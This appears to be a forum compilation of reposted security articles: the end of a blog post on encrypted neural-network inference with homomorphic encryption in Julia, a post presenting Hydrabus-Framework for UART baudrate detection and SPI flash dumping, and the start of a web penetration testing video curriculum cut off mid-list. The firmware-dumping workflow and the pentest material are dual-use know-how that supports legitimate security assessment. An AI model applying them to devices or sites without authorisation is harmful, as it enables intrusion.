system, we generally have the following operations available: pub_key, eval_key, priv_key = keygen() encrypted = encrypt(pub_key, plaintext) decrypted = decrypt(priv_key, encrypted) encrypted′ = eval(eval_key, f, encrypted) the first three are fairly straightforward and should be familiar to anyone who has used any sort of asymmetric cryptography before (as you did when you connected to this blog post via TLS). The last operation is where the magic is. It evaluates some function f on the encryption and returns another encrypted value corresponding to the result of evaluting f on the encrypted value. It is this property that gives homomorphic computation its name. Evaluation commutes with the encryption operation: f(decrypt(priv_key, encrypted)) == decrypt(priv_key, eval(eval_key, f, encrypted)) (Equivalently it is possible to evaluate arbitrary homomorphisms f on the encrypted value). Which functions f are supported depends on the cryptographic schemes and depending on the supported operations. If only one f is supported (e.g. f = +), we call an encryption scheme “partially homomorphic”. If f can be any complete set of gates out of which we can build arbitrary circuits, we call the computation “somewhat homomorphic” if the size of the circuit is limited or “fully homomorphic” if the size of the circuit is unlimited. It is often possible to turn “somehwhat” into “fully” homomorphic encryption through a technique known as bootstrapping though that is beyond the scope of the current blog post. Fully homomorphic encryption is a fairly recent discovery, with the first viable (though not practical) scheme published by Craig Gentry in 2009. There are several more recent (and practical) FHE schemes. More importantly, there are software packages that implement them efficiently. The two most commonly used ones are probably Microsoft SEAL and PALISADE. In addition, I recently open sourced a pure julia implementation of these algorithms. For our purposes we will be using the CKKS encryption as implemented in the latter. CKKS High Level CKKS (named after Cheon-Kim-Kim-Song, the authors of the 2016 paper that proposed it) is a homomorphic encryption scheme that allows homomorphic evaluation of the following primitive operations: Elementwise addition of length n vectors of complex numbers Elementwise multiplication of length n complex vectors Rotation (in the circshift sense) of elements in the vector Complex conjugation of vector elements The parameter n here depends on the desired security and precision and is generally relatively high. For our example it will be 4096 (higher numbers are more secure, but also more expensive, scaling as roughly n log n). Additionally, computations using CKKS are noisy. As a result, computational results are only approximate and care must be taken to ensure that results are evaluated with sufficient precision to not affect the correctness of a result. That said, these restrictions are not all that unusual to developers of machine learning packages. Special purpose accelerators like GPUs also generally operate on vectors of numbers. Likewise, for many developers floating point numbers can sometimes feel noisy due to effects of algorithms selection, multithreading etc. (I want to emphasize that there is a crucial difference here in that floating point arithmetic is inherently deterministic, even if it sometimes doesn’t appear that way due to complexity of the implementation, while the CKKS primitives really are noisy, but perhaps this allows users to appreciate that noisyness is not as scary as it might at first appear). With that in mind, let’s see how we can perform these operations in Julia (note: these are highly insecure parameter choices, the purpose of these operations is to illustrate usage of the library at the REPL) julia> using ToyFHE # Let's play with 8 element vectors julia> N = 8; # Choose some parameters - we'll talk about it later julia> ℛ = NegacyclicRing(2N, (40, 40, 40)) ℤ₁₃₂₉₂₂₇₉₉₇₅₆₈₀₈₁₄₅₇₄₀₂₇₀₁₂₀₇₁₀₄₂₄₈₂₅₇/(x¹⁶ + 1) # We'll use CKKS julia> params = CKKSParams(ℛ) CKKS parameters # We need to pick a scaling factor for a numbers - again we'll talk about that later julia> Tscale = FixedRational{2^40} FixedRational{1099511627776,T} where T # Let's start with a plain Vector of zeros julia> plain = CKKSEncoding{Tscale}(zero(ℛ)) 8-element CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7: 0.0 + 0.0im 0.0 + 0.0im 0.0 + 0.0im 0.0 + 0.0im 0.0 + 0.0im 0.0 + 0.0im 0.0 + 0.0im 0.0 + 0.0im # Ok, we're ready to get started, but first we'll need some keys julia> kp = keygen(params) CKKS key pair julia> kp.priv CKKS private key julia> kp.pub CKKS public key # Alright, let's encrypt some things: julia> foreach(i->plain[i] = i+1, 0:7); plain 8-element CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7: 1.0 + 0.0im 2.0 + 0.0im 3.0 + 0.0im 4.0 + 0.0im 5.0 + 0.0im 6.0 + 0.0im 7.0 + 0.0im 8.0 + 0.0im julia> c = encrypt(kp.pub, plain) CKKS ciphertext (length 2, encoding CKKSEncoding{FixedRational{1099511627776,T} where T}) # And decrypt it again julia> decrypt(kp.priv, c) 8-element CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7: 0.9999999999995506 - 2.7335193113350057e-16im 1.9999999999989408 - 3.885780586188048e-16im 3.000000000000205 + 1.6772825551165524e-16im 4.000000000000538 - 3.885780586188048e-16im 4.999999999998865 + 8.382500573679615e-17im 6.000000000000185 + 4.996003610813204e-16im 7.000000000001043 - 2.0024593503998215e-16im 8.000000000000673 + 4.996003610813204e-16im # Note that we had some noise. Let's go through all the primitive operations we'll need: julia> decrypt(kp.priv, c+c) 8-element CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7: 1.9999999999991012 - 5.467038622670011e-16im 3.9999999999978817 - 7.771561172376096e-16im 6.00000000000041 + 3.354565110233105e-16im 8.000000000001076 - 7.771561172376096e-16im 9.99999999999773 + 1.676500114735923e-16im 12.00000000000037 + 9.992007221626409e-16im 14.000000000002085 - 4.004918700799643e-16im 16.000000000001346 + 9.992007221626409e-16im julia> csq = c*c CKKS ciphertext (length 3, encoding CKKSEncoding{FixedRational{1208925819614629174706176,T} where T}) julia> decrypt(kp.priv, csq) 8-element CKKSEncoding{FixedRational{1208925819614629174706176,T} where T} with indices 0:7: 0.9999999999991012 - 2.350516767363621e-15im 3.9999999999957616 - 5.773159728050814e-15im 9.000000000001226 - 2.534464540987068e-15im 16.000000000004306 - 2.220446049250313e-15im 24.99999999998865 + 2.0903753311370056e-15im 36.00000000000222 + 4.884981308350689e-15im 49.000000000014595 + 1.0182491378134327e-15im 64.00000000001077 + 4.884981308350689e-15im That was easy! The eagle eyed reader may have noticed that csq looks a bit different from the previous ciphertext. In particular, it is a “length 3” ciphertext and the scale is much larger. What these are and what they do is a bit too complicated for this point in the blog post, but suffice it to say, we want to get these back down before we do further computation, or we’ll run out of “space” in the ciphertext. Luckily, there is a way to do these for each of the two aspects that grew: # To get back down to length 2, we need to `keyswitch` (aka # relinerarize), which requires an evaluation key. Generating # this requires the private key. In a real application we would # have generated this up front and sent it along with the encrypted # data, but since we have the private key, we can just do it now. julia> ek = keygen(EvalMultKey, kp.priv) CKKS multiplication key julia> csq_length2 = keyswitch(ek, csq) CKKS ciphertext (length 2, encoding CKKSEncoding{FixedRational{1208925819614629174706176,T} where T}) # Getting the scale back down is done using modswitching. julia> csq_smaller = modswitch(csq_length2) CKKS ciphertext (length 2, encoding CKKSEncoding{FixedRational{1.099511626783e12,T} where T}) # And it still decrypts correctly (though note we've lost some precision) julia> decrypt(kp.priv, csq_smaller) 8-element CKKSEncoding{FixedRational{1.099511626783e12,T} where T} with indices 0:7: 0.9999999999802469 - 5.005163520332181e-11im 3.9999999999957723 - 1.0468514951188039e-11im 8.999999999998249 - 4.7588542623100616e-12im 16.000000000023014 - 1.0413447889166631e-11im 24.999999999955193 - 6.187833723406491e-12im 36.000000000002345 + 1.860733715346631e-13im 49.00000000001647 - 1.442396043149794e-12im 63.999999999988695 - 1.0722489563648028e-10im Additionally, modswitching (short for modulus switching) reduces the size of the ciphertext modulus, so we can’t just keep doing this indefinitely. (In the terminology from above, we’re using a SHE scheme): julia> ℛ # Remember the ring we initially created ℤ₁₃₂₉₂₂₇₉₉₇₅₆₈₀₈₁₄₅₇₄₀₂₇₀₁₂₀₇₁₀₄₂₄₈₂₅₇/(x¹⁶ + 1) julia> ToyFHE.ring(csq_smaller) # It shrunk! ℤ₁₂₀₈₉₂₅₈₂₀₁₄₄₅₉₃₇₇₉₃₃₁₅₅₃/(x¹⁶ + 1) There’s one last operation we’ll need: rotations. Like keyswitching above, this requires an evaluation key (also called a galois key): julia> gk = keygen(GaloisKey, kp.priv; steps=2) CKKS galois key (element 25) julia> decrypt(circshift(c, gk)) decrypt(kp, circshift(c, gk)) 8-element CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7: 7.000000000001042 + 5.68459112632516e-16im 8.000000000000673 + 5.551115123125783e-17im 0.999999999999551 - 2.308655353580721e-16im 1.9999999999989408 + 2.7755575615628914e-16im 3.000000000000205 - 6.009767921608429e-16im 4.000000000000538 + 5.551115123125783e-17im 4.999999999998865 + 4.133860996136768e-17im 6.000000000000185 - 1.6653345369377348e-16im # And let's compare to doing the same on the plaintext julia> circshift(plain, 2) 8-element OffsetArray(::Array{Complex{Float64},1}, 0:7) with eltype Complex{Float64} with indices 0:7: 7.0 + 0.0im 8.0 + 0.0im 1.0 + 0.0im 2.0 + 0.0im 3.0 + 0.0im 4.0 + 0.0im 5.0 + 0.0im 6.0 + 0.0im Alright, we’ve covered the basic usage of the HE library. Before we get started thinking about how to perform neural network inference using these primitives, let’s look at and train the neural network we’ll be using. The machine learning model If you’re not familiar with machine learning, or the Flux.jl machine learning library, I’d recommend a quick detour to the Flux.jl documentation or our free Introduction to Machine Learning course on JuliaAcademy, since we’ll only be discussing the changes for running the model on encrypted data. Our starting point is the convolutional neural network example in the Flux model zoo. We’ll keep the training loop, data preparation, etc. the same and just tweak the model slightly. The model we’ll use is: function reshape_and_vcat(x) let y=reshape(x, 64, 4, size(x, 4)) vcat((y[:,i,:] for i=axes(y,2))...) end end model = Chain( # First convolution, operating upon a 28x28 image Conv((7, 7), 1=>4, stride=(3,3), x->x.^2), reshape_and_vcat, Dense(256, 64, x->x.^2), Dense(64, 10), ) This is essentially the same model as the one used in the paper “Secure Outsourced Matrix Computation and Application to Neural Networks”, which uses the same cryptographic scheme for the same demo, with two differences: 1) They also encrypt the model, which we neglect here for simplicity and 2) We have bias vectors after every layer (which is what Flux will do by default), which I’m not sure was the case for the model evaluated in the paper. Perhaps because of 2), the test set accuracy of our model is slightly higher (98.6% vs 98.1%), but this may of course also just come down to hyperparameter differences. An unusual feature (for those coming from a machine learning background) are the x.^2 activation functions. More common choices here would be something like tanh or relu or something fancier than that. However, while those functions (relu in particular) are cheap to evaluate on plaintext values, they would be quite expensive to evaluated encryptedly (we’d basically evaluate a polynomial approximation). Luckily x.^2 works fine our our purposes. The rest of the training loop is basically the same. The softmax was removed from the model in favor of a logitcrossentropy loss function (though of course we could have kept it and just evaluated the softmax after decryption on the client). The full code to train this model is on GitHub and completes in a few minutes on any recent GPU. Performing the operations efficiently Alright, now that we know what we need to do, let’s take stock of what operations we need to be able to do: Convolutions Elementwise Squaring Matrix Multiply Squaring is trivial, we already saw that above, so let’s tackle the other two in order. Throughout we’ll be assuming that we’re working with a batch size of 64 (you may note that the model parameters and batch size were strategically chosen to take good advantage of a 4096 element vector which is what we get from realistic parameter choices). Convolution Let us recall how convolution works. We take some window (in our case 7x7) of the original input array and for each element in the window multiply by an element of the convolution mask. Then we move the window over some (in our case, the stride is 3, so we move over by 3 elements) and repeat the process (with the same convolution mask). This process is illustrated in the following animation (source) for a 3x3 convolution with stride (2, 2) (the blue array is the input, the green array the output): Additionally, we have convolutions into 4 different “channels” (all this means is that we repeat the convolution 3 more times with different convolution masks). Alright, so now that we know what we’re doing let’s figure out how to do it. We’re in luck in that the convolution is the first thing in our model. As a result, we can do some preprocessing on the client before encrypting the data (without needing the model weights) to save us some work. In particular, we’ll do the following: Precompute each convolution window (i.e. 7x7 extraction from the original images), giving us 64 7x7 matrices per input image (note for 7x7 windows with stride 2 there are 8x8 convolution windows to evaluate per 28x28 input image) Collect the same position in each window into one vector, i.e. we’ll have a 64-element vector for each image or a 64x64 element vector for a batch of 64 (i.e. a total of 49 64x64 matrices) Encrypt that The convolution then simply becomes scalar multiplication of the whole matrix with the appropriate mask element, and by summing all 49 elements later, we the result of the convolution. An implementation of this strategy (on the plaintext) may look like: function public_preprocess(batch) ka = OffsetArray(0:7, 0:7) # Create feature extracted matrix I = [[batch[i′*3 .+ (1:7), j′*3 .+ (1:7), 1, k] for i′=ka, j′=ka] for k = 1:64] # Reshape into the ciphertext Iᵢⱼ = [[I[k][l...][i,j] for k=1:64, l=product(ka, ka)] for i=1:7, j=1:7] end Iᵢⱼ = public_preprocess(batch) # Evaluate the convolution weights = model.layers[1].weight conv_weights = reverse(reverse(weights, dims=1), dims=2) conved = [sum(Iᵢⱼ[i,j]*conv_weights[i,j,1,channel] for i=1:7, j=1:7) for channel = 1:4] conved = map(((x,b),)->x .+ b, zip(conved, model.layers[1].bias)) which (modulo a reordering of the dimension) gives the same answer as, but using operations model.layers[1](batch) Adding the encryption operations, we have: Iᵢⱼ = public_preprocess(batch) C_Iᵢⱼ = map(Iᵢⱼ) do Iij plain = CKKSEncoding{Tscale}(zero(plaintext_space(ckks_params))) plain .= OffsetArray(vec(Iij), 0:(N÷2-1)) encrypt(kp, plain) end weights = model.layers[1].weight conv_weights = reverse(reverse(weights, dims=1), dims=2) conved3 = [sum(C_Iᵢⱼ[i,j]*conv_weights[i,j,1,channel] for i=1:7, j=1:7) for channel = 1:4] conved2 = map(((x,b),)->x .+ b, zip(conved3, model.layers[1].bias)) conved1 = map(ToyFHE.modswitch, conved2) Note that a keyswitch isn’t required because the weights are public, so we didn’t expand the length of the ciphertext. Matrix multiply Moving on to matrix multiply, we take advantage of the fact that we can rotate elements in the vector to effect a re-ordering of the multiplication indices. In particular, consider a row-major ordering of matrix elements in the vector. Then, if we shift the vector by a multiple of the row-size, we get the effect of rotating the columns, which is a sufficient primitive for implementing matrix multiply (of square matrices at least). Let’s try it: function matmul_square_reordered(weights, x) sum(1:size(weights, 1)) do k # We rotate the columns of the LHS and take the diagonal weight_diag = diag(circshift(weights, (0,(k-1)))) # We rotate the rows of the RHS x_rotated = circshift(x, (k-1,0)) # We do an elementwise, broadcast multiply weight_diag .* x_rotated end end function matmul_reorderd(weights, x) sum(partition(1:256, 64)) do range matmul_square_reordered(weights[:, range], x[range, :]) end end fc1_weights = model.layers[3].W x = rand(Float64, 256, 64) @assert (fc1_weights*x) ≈ matmul_reorderd(fc1_weights, x) Of course for general matrix multiply, we may want something fancier, but it’ll do for now. Making it nicer At this point, we’ve managed to get everything together and indeed it works. For reference, here it is in all its glory (omitting setup for parameter selection and the like): ek = keygen(EvalMultKey, kp.priv) gk = keygen(GaloisKey, kp.priv; steps=64) Iᵢⱼ = public_preprocess(batch) C_Iᵢⱼ = map(Iᵢⱼ) do Iij plain = CKKSEncoding{Tscale}(zero(plaintext_space(ckks_params))) plain .= OffsetArray(vec(Iij), 0:(N÷2-1)) encrypt(kp, plain) end weights = model.layers[1].weight conv_weights = reverse(reverse(weights, dims=1), dims=2) conved3 = [sum(C_Iᵢⱼ[i,j]*conv_weights[i,j,1,channel] for i=1:7, j=1:7) for channel = 1:4] conved2 = map(((x,b),)->x .+ b, zip(conved3, model.layers[1].bias)) conved1 = map(ToyFHE.modswitch, conved2) Csqed1 = map(x->x*x, conved1) Csqed1 = map(x->keyswitch(ek, x), Csqed1) Csqed1 = map(ToyFHE.modswitch, Csqed1) function encrypted_matmul(gk, weights, x::ToyFHE.CipherText) result = repeat(diag(weights), inner=64).*x rotated = x for k = 2:64 rotated = ToyFHE.rotate(gk, rotated) result += repeat(diag(circshift(weights, (0,(k-1)))), inner=64) .* rotated end result end fq1_weights = model.layers[3].W Cfq1 = sum(enumerate(partition(1:256, 64))) do (i,range) encrypted_matmul(gk, fq1_weights[:, range], Csqed1[i]) end Cfq1 = Cfq1 .+ OffsetArray(repeat(model.layers[3].b, inner=64), 0:4095) Cfq1 = modswitch(Cfq1) Csqed2 = Cfq1*Cfq1 Csqed2 = keyswitch(ek, Csqed2) Csqed2 = modswitch(Csqed2) function naive_rectangular_matmul(gk, weights, x) @assert size(weights, 1) < size(weights, 2) weights = vcat(weights, zeros(eltype(weights), size(weights, 2)-size(weights, 1), size(weights, 2))) encrypted_matmul(gk, weights, x) end fq2_weights = model.layers[4].W Cresult = naive_rectangular_matmul(gk, fq2_weights, Csqed2) Cresult = Cresult .+ OffsetArray(repeat(vcat(model.layers[4].b, zeros(54)), inner=64), 0:4095) Not very pretty to look at, but hopefully if you have made it this far in the blog post, you should be able to understand each step in the sequence. Now, let’s turn our attention to thinking about some abstractions that would make all this easier. We’re now leaving the realm of cryptography and machine learning and arriving at programming language design, so let’s take advantage of fact that Julia allows powerful abstractions and go through the exercise of building some. For example, we could encapsulate the whole convolution extraction process as a custom array type: using BlockArrays """ ExplodedConvArray{T, Dims, Storage} <: AbstractArray{T, 4} Represents a an `nxmx1xb` array of images, but rearranged into a series of convolution windows. Evaluating a convolution compatible with `Dims` on this array is achievable through a sequence of scalar multiplications and sums on the underling storage. """ struct ExplodedConvArray{T, Dims, Storage} <: AbstractArray{T, 4} # sx*sy matrix of b*(dx*dy) matrices of extracted elements # where (sx, sy) = kernel_size(Dims) # (dx, dy) = output_size(DenseConvDims(...)) cdims::Dims x::Matrix{Storage} function ExplodedConvArray{T, Dims, Storage}(cdims::Dims, storage::Matrix{Storage}) where {T, Dims, Storage} @assert all(==(size(storage[1])), size.(storage)) new{T, Dims, Storage}(cdims, storage) end end Base.size(ex::ExplodedConvArray) = (NNlib.input_size(ex.cdims)..., 1, size(ex.x[1], 1)) function ExplodedConvArray{T}(cdims, batch::AbstractArray{T, 4}) where {T} x, y = NNlib.output_size(cdims) kx, ky = NNlib.kernel_size(cdims) stridex, stridey = NNlib.stride(cdims) kax = OffsetArray(0:x-1, 0:x-1) kay = OffsetArray(0:x-1, 0:x-1) I = [[batch[i′*stridex .+ (1:kx), j′*stridey .+ (1:ky), 1, k] for i′=kax, j′=kay] for k = 1:size(batch, 4)] Iᵢⱼ = [[I[k][l...][i,j] for k=1:size(batch, 4), l=product(kax, kay)] for (i,j) in product(1:kx, 1:ky)] ExplodedConvArray{T, typeof(cdims), eltype(Iᵢⱼ)}(cdims, Iᵢⱼ) end function NNlib.conv(x::ExplodedConvArray{<:Any, Dims}, weights::AbstractArray{<:Any, 4}, cdims::Dims) where {Dims<:ConvDims} blocks = reshape([ Base.ReshapedArray(sum(x.x[i,j]*weights[i,j,1,channel] for i=1:7, j=1:7), (NNlib.output_size(cdims)...,1,size(x, 4)), ()) for channel = 1:4 ],(1,1,4,1)) BlockArrays._BlockArray(blocks, BlockArrays.BlockSizes([8], [8], [1,1,1,1], [64])) end Note that here we made use BlockArrays back to represent a 8x8x4x64 array as 4 8x8x1x64 arrays as in the original code. Ok, so now we already have a much nicer representation of the first step, at least on unencrypted arrays: julia> cdims = DenseConvDims(batch, model.layers[1].weight; stride=(3,3), padding=(0,0,0,0), dilation=(1,1)) DenseConvDims: (28, 28, 1) * (7, 7) -> (8, 8, 4), stride: (3, 3) pad: (0, 0, 0, 0), dil: (1, 1), flip: false julia> a = ExplodedConvArray{eltype(batch)}(cdims, batch); julia> model(a) 10×64 Array{Float32,2}: [snip] How do we bring this into the encrypted world? Well, we need to do two things: We want to encrypt a struct (ExplodedConvArray) in such a way that each that we get a ciphertext for each field. Then, operations on this encrypted struct work by looking up what the function would have done on the original struct and simply doing the same homomorphically. We want to intercept certain operations to be done differently in the encrypted context. Luckily, Julia, provides an abstraction that lets us a do both: A compiler plugin-in using the Cassette.jl mechanism. How this works and how to use it is a bit of a complicated story, so I will omit it from this blog, post, but briefly, you can define a Context (say Encrypted and then define rules for how operations under this context work). For example, for the second requirement might be written, as: # Define Matrix multiplication between an array and an encrypted block array function (*::Encrypted{typeof(*)})(a::Array{T, 2}, b::Encrypted{<:BlockArray{T, 2}}) where {T} sum(a*b for (i,range) in enumerate(partition(1:size(a, 2), size(b.blocks[1], 1)))) end # Define Matrix multiplication between an array and an encrypted array function (*::Encrypted{typeof(*)})(a::Array{T, 2}, b::Encrypted{Array{T, 2}}) where {T} result = repeat(diag(a), inner=size(a, 1)).*x rotated = b for k = 2:size(a, 2) rotated = ToyFHE.rotate(GaloisKey(*), rotated) result += repeat(diag(circshift(a, (0,(k-1)))), inner=size(a, 1)) .* rotated end result end The end result of all of this that the user should be able to write the whole thing above with minimal manual work: kp = keygen(ckks_params) ek = keygen(EvalMultKey, kp.priv) gk = keygen(GaloisKey, kp.priv; steps=64) # Create evaluation context ctx = Encrypted(ek, gk) # Do public preprocessing batch = ExplodedConvArray{eltype(batch)}(cdims, batch); # Run on encrypted data under the encryption context Cresult = ctx(model)(encrypt(kp.pub, batch)) # Decrypt the answer decrypt(kp, Cresult) Of course, even that may not be optimal. The parameters of the cryptosystem (e.g. the ring ℛ, when to modswitch, keyswitch, etc) represent a tradeoff between precision of the answer, security and performance and depend strongly on the code being run. In general, one would want the compiler to analyze the code it’s about to run encrypted, suggest parameters for a given security level and desired precision and then generate the code with minimal manual work by the user. Conclusion Achieving the dream of automatically executing arbitrary computations securely is a tall order for any system, but Julia’s metaprogramming capabilities and friendly syntax make it well suited as a development platform. Some attempts at this have already been made by the RAMPARTS collaboration (paper, JuliaCon talk), which compiles simple Julia code to the PALISADE FHE library. Julia Computing is collaborating with the experts behind RAMPARTS on Verona, the recently announced next generation version of that system. Only in the past year or so has the performance of homomorphic encryption systems reached the point where it is possible to actually evaluate interesting computations at speed approaching practical usability. The floodgates are open. With new advances in algorithms, software and hardware, homomorphic encryption is sure to become a mainstream technology to protect the privacy of millions of users. If you would like to understand more deeply how everything works, I have tried to make sure that the ToyFHE repository is readable. There is also some documentation that I’m hoping gives a somewhat approachable introduction to the cryptography involved. Of course much work remains to be done. If you are interested in this kind of work or have interesting applications, do not hesitate to get in touch. Sursa: https://juliacomputing.com/blog/2019/11/22/encrypted-machine-learning.html
  14. Hydrabus Framework Hardware tool security tools hardware ghecko Oct 20 Hi Guys, Before diving into the main subject, I’m a security engineer and I’m fascinated by hardware security assessment. Since I play with some hardware tools like Bus Pirate and Hydrabus, I noticed that no tools bring together all the necessary scripts to interact with hardware protocols. Who has never been frustrated during a hardware security assessment facing a chip or a debug port exposed, and you don’t have the necessary script to dump it, find the baudrate of a UART port or properly communicate with it? That’s why I choose to develop a new framework for the awesome hardware tools Hydrabus 26 named (Hydrabus-Framework)[https://github.com/hydrabus-framework/framework 78]. It provides multiple modules allowing you to work efficiently and save time on any hardware project. This framework works like Metasploit, simply run hbfconsole, select a module using the use command, set the needed options with set and run it with the run command! It will also include a Miniterm to directly interact with the Hydrabus CLI. At the time of this writing, 3 modules are available. Modules hbfmodules.uart.baudrates This module allowing you to detect the baudrate of a UART target. It changes the UART baudrate automatically till finding the correct value. If it finds a valid baudrate, it prompts you to open a Miniterm session using the Hydrabus binary UART bridge. 99 hbfmodules.spi.chip_id The SPI chip_id module allows you to recover the ID of an SPI flash chip, useful to verify if the Hydrabus is correctly interfaced with the target or to identify the family of an unknown chip. It will be improved in the near future to print the manufacturer if finding and the chip name (Like flashrom) 9 hbfmodules.spi.dump_eeprom SPI dump_eeprom is used to dump an SPI flash. With this module, you can easily dump a flash memory and don’t waste your time writing a script to do this. You can rapidly jump to the analyze of the freshly dumped firmware! 15 More modules are coming soon! You can download the latest modules and update the framework by simply running the hbfupdate script. Architecture This framework has been developed with scalability in mind. Indeed, you can add modules without having to modify the framework’s core engine. Each module inherits from the abstract class AModule, providing a solid foundation to start coding your own module. Once the module is created and installed using python setup.py install, you can use it in the framework. Contributing To create a new module, open an issue on hbfmodules.skeleton, I will create a new repository initialized with the hbfmodules.skeleton repository, once you have provided the needed information. You can read more information to contribute to this project on the CONTRIBUTING.md file. Use case: Dumping an SPI flash chip. ghecko % hbfconsole _ ___ _______ _____ ____ _ _ _____ | | | \ \ / / __ \| __ \ /\ | _ \| | | |/ ____| | |__| |\ \_/ /| | | | |__) | / \ | |_) | | | | (___ | __ | \ / | | | | _ / / /\ \ | _ <| | | |\___ \ | | | | | | | |__| | | \ \ / ____ \| |_) | |__| |____) | |_|__|_|__|_| |_____/|_|__\_\/_/____\_\____/ \____/|_____/____ _ __ | ____| __ \ /\ | \/ | ____\ \ / / __ \| __ \| |/ / | |__ | |__) | / \ | \ / | |__ \ \ /\ / / | | | |__) | ' / | __| | _ / / /\ \ | |\/| | __| \ \/ \/ /| | | | _ /| < | | | | \ \ / ____ \| | | | |____ \ /\ / | |__| | | \ \| . \ |_| |_| \_\/_/ \_\_| |_|______| \/ \/ \____/|_| \_\_|\_\ [*] 3 modules loaded, run 'hbfupdate' command to install the latest modules [hbf] > use spi/dump_eeprom [hbf] spi(dump_eeprom)> show options Author: Jordan Ovrè Module name: dump SPI EEPROM, version 0.0.2 Description: Module to dump SPI EEPROM Name Value Required Description ------------ ------------ ---------- -------------------------------------------------------------------------- hydrabus /dev/ttyACM0 True Hydrabus device timeout 1 True Hydrabus read timeout dumpfile True The dump filename sectors 1024 True The number of sector (4096) to read. For example 1024 sector * 4096 = 4MiB start_sector 0 True The starting sector (1 sector = 4096 bytes) spi_device 1 True The hydrabus SPI device (1=SPI1 or 0=SPI2) spi_speed slow True set SPI speed (fast = 10.5MHz, slow = 320kHz, medium = 5MHz) spi_polarity 0 True set SPI polarity (1=high or 0=low) spi_phase 0 True set SPI phase (1=high or 0=low) [hbf] spi(dump_eeprom)> set dumpfile firmware.bin dumpfile ==> firmware.bin [hbf] spi(dump_eeprom)> set spi_speed medium spi_speed ==> medium [hbf] spi(dump_eeprom)> run [*] Starting to read chip... Reading 1024 sectors Dump 4.0MiB Readed: 4.0MiB [✔] Finished dumping to firmware.bin [*] Reset hydrabus to console mode [hbf] spi(dump_eeprom)> binwalk firmware.bin DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 134816 0x20EA0 Certificate in DER format (x509 v3), header length: 4, sequence length: 64 150864 0x24D50 U-Boot version string, "U-Boot 1.1.4 (Nov 26 2012 - 15:58:42)" 151232 0x24EC0 CRC32 polynomial table, big endian 160905 0x27489 Copyright string: "copyright." 262208 0x40040 LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 2465316 bytes 1114112 0x110000 Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2676149 bytes, 1117 inodes, blocksize: 131072 bytes, created: 2013-11-12 09:49:10 3801091 0x3A0003 POSIX tar archive (GNU), owner user name: "_table.tar.gz" You can find the tools and more details on the official github repository: hydrabus-framework 78 Ghecko. Sursa: https://0x00sec.org/t/hydrabus-framework/17057
  15. Web Application Penetration Testing Phase 1 – History 1. History of Internet - https://www.youtube.com/watch?v=9hIQjrMHTv4 Phase 2 – Web and Server Technology 2. Basic concepts of web applications, how they work and the HTTP protocol - https://www.youtube.com/watch?v=RsQ1tFLwldY&t=7s 3. HTML basics part 1 - https://www.youtube.com/watch?v=p6fRBGI_BY0 4. HTML basics part 2 - https://www.youtube.com/watch?v=Zs6lzuBVK2w 5. Difference between static and dynamic website - https://www.youtube.com/watch?v=hlg6q6OFoxQ 6. HTTP protocol Understanding - https://www.youtube.com/watch?v=JFZMyhRTVt0 7. Parts of HTTP Request -https://www.youtube.com/watch?v=pHFWGN-upGM 8. Parts of HTTP Response - https://www.youtube.com/watch?v=c9sMNc2PrMU 9. Various HTTP Methods - https://www.youtube.com/watch?v=PO7D20HsFsY 10. Understanding URLS - https://www.youtube.com/watch?v=5Jr-_Za5yQM 11. Intro to REST - https://www.youtube.com/watch?v=YCcAE2SCQ6k 12. HTTP Request & Response Headers - https://www.youtube.com/watch?v=vAuZwirKjWs 13. What is a cookie - https://www.youtube.com/watch?v=I01XMRo2ESg 14. HTTP Status codes - https://www.youtube.com/watch?v=VLH3FMQ5BIQ 15. HTTP Proxy - https://www.youtube.com/watch?v=qU0PVSJCKcs 16. Authentication with HTTP - https://www.youtube.com/watch?v=GxiFXUFKo1M 17. HTTP basic and digest authentication - https://www.youtube.com/watch?v=GOnhCbDhMzk 18. What is “Server-Side” - https://www.youtube.com/watch?v=JnCLmLO9LhA 19. Server and client side with example - https://www.youtube.com/watch?v=DcBB2Fp8WNI 20. What is a session - https://www.youtube.com/watch?v=WV4DJ6b0jhg&t=202s 21. Introduction to UTF-8 and Unicode - https://www.youtube.com/watch?v=sqPTR_v4qFA 22. URL encoding - https://www.youtube.com/watch?v=Z3udiqgW1VA 23. HTML encoding - https://www.youtube.com/watch?v=IiAfCLWpgII&t=109s 24. Base64 encoding - https://www.youtube.com/watch?v=8qkxeZmKmOY 25. Hex encoding & ASCII - https://www.youtube.com/watch?v=WW2SaCMnHdU Phase 3 – Setting up the lab with BurpSuite and bWAPP MANISH AGRAWAL 26. Setup lab with bWAPP - https://www.youtube.com/watch?v=dwtUn3giwTk&index=1&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 27. Set up Burp Suite - https://www.youtube.com/watch?v=hQsT4rSa_v0&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=2 28. Configure Firefox and add certificate - https://www.youtube.com/watch?v=hfsdJ69GSV4&index=3&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 29. Mapping and scoping website - https://www.youtube.com/watch?v=H-_iVteMDRo&index=4&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 30. Spidering - https://www.youtube.com/watch?v=97uMUQGIe14&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=5 31. Active and passive scanning - https://www.youtube.com/watch?v=1Mjom6AcFyU&index=6&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 32. Scanner options and demo - https://www.youtube.com/watch?v=gANi4Kt7-ek&index=7&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 33. Introduction to password security - https://www.youtube.com/watch?v=FwcUhcLO9iM&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=8 34. Intruder - https://www.youtube.com/watch?v=wtMg9oEMTa8&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=9 35. Intruder attack types - https://www.youtube.com/watch?v=N5ndYPwddkQ&index=10&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 36. Payload settings - https://www.youtube.com/watch?v=5GpdlbtL-1Q&index=11&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 37. Intruder settings - 